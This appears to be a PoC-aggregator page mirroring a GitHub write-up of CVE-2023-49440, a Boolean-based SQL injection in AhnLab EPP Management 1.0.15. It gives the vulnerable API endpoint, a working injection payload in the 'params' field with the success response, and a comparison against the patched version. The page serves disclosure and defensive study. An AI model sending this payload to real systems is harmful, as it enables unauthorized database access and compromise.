POC详情: 5c019837c21de4fc0ada97ee94a6d92867937924

来源
https://github.com/KernelCipher/CVE-2023-49440-POC
关联漏洞
标题: AhnLab EPP 安全漏洞 (CVE-2023-49440)
描述:AhnLab EPP是韩国AhnLab公司的一套终端安全防护平台。 AhnLab EPP 1.0.15版本存在安全漏洞,该漏洞源于对参数preview的错误操作,可能导致SQL注入攻击。
介绍
# CVE-2023-49440-POC

Exploit Title: ***AhnLab EPP Management(Centralised Endpoint Security Management) - Boolean-based-SQL-Injection SQL Injection that led to RCE***

Date: 16 July 2023

Exploit Author: KernelCipher

CVE : CVE-2023-49440

Vendor Homepage: https://www.ahnlab.com/en

Software Link:https://www.ahnlab.com/ko/product/epp-management

Product Reveiw:https://www.gartner.com/reviews/market/endpoint-protection-platforms/compare/product/ahnlab-edr-vs-ahnlab-epp

Refence Link: https://cve.report/CVE-2023-49440

Vulnerable Version: 1.0.15 and before

Fix Version: later 1.0.15 version released (2023)

***Vulnerability and Product description***:

AhnLab EPP Management is a globally recognized next-generation advanced endpoint protection platform that integrates patch management, advanced malware detection, EDR, and XDR capabilities to provide centralised management, real-time monitoring, and policy control across enterprise endpoints. A Boolean-based and time-based SQL injection was discovered in the web admin interface of AhnLab EPP Management v1.0.15, which led to full compromise of the backend database with administrative privileges and limited remote code execution (RCE). Several endpoints were vulnerable to A Boolean-based SQL Injection vulnerability, such as **Preview*** parameter within the JSON, etc.’All affected endpoints were patched in releases after v1.0.15, and fixes were applied in 2023.

***This is proof of reproduction for a Boolean-based SQL injection in AhnLab EPP Management. however, I will not release the Python PoC for security reasons until next year, and the affected version was patched over two years ago***

### Request
```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json; charset=utf-8
Accept-Language: en-GER;q=0.8,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate
Authorization: bearer<Token>
Content-Type: application/json; charset=utf-8
Content-Length: 180
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": 1,
    "params": [
      "RDB",
      "(SELECT CONCAT(CONCAT(abc, (CASE WHEN (1337=1337) THEN '1' ELSE '0' END)), def))"
    ]
  },
  "data": []
}
```

### Response

```
HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-type: application/json; charset=utf-8
content-length: 135
date:  21 may 2023 11:48:00 GMT
cache-control: no-cache, no-store, no-control
connection: close

{
  "error_code": "EPP-00000",
  "error_msg": "success",
  "revision": 1,
  "response": [
    {
      "report": "[{\"concat\":\"abcdef\"}]",
      "item_order": 1
    }
  ]
}

```

### Fixed Version

### Request

```
POST /api/console/ems/query/report/preview HTTP/1.1
Host: 192.168.100.199:8803
Cookie: lang_set=en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json;charset=utf-8
Accept-Language: en,vi-GER;q=0.8,en-US;q=0.5,vi;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: bearer <Token>
Content-Type: application/json;charset=utf-8
Content-Length: 241
Origin: https://192.168.100.199:8803
Referer: https://192.168.100.199:8803/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{
  "request": {
    "action": "preview_query_report",
    "revision": "1",
    "params": [
      "RDB",
      "1",
      "(SELECT CONCAT(CONCAT('abc', (CASE WHEN (1337=1337) THEN '1' ELSE '0' END)), 'def'))"
    ]
  },
  "data": {
    "extract_key": "<Key>="
  }
}

```
### Response
```

HTTP/1.1 200
strict-transport-security: max-age=0
x-frame-options: DENY
x-content-type-options: nosniff
content-type: application/json;charset=utf-8
content-length: 181
date: 16 Sept 2023 10:28:10 GMT
cache-control: no-cache,no-store,no-control
connection: close

{
  "error_code": "SWU-00027",
  "error_msg": "[SWU-00027] Conceal key expired. : \"\\\"extract_key\\\":\\\"<Key>=\\\"\"",
  "revision": 1,
  "response": [
  ]
}

```
文件快照

 [4.0K]  /data/pocs/5c019837c21de4fc0ada97ee94a6d92867937924
└── [4.2K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。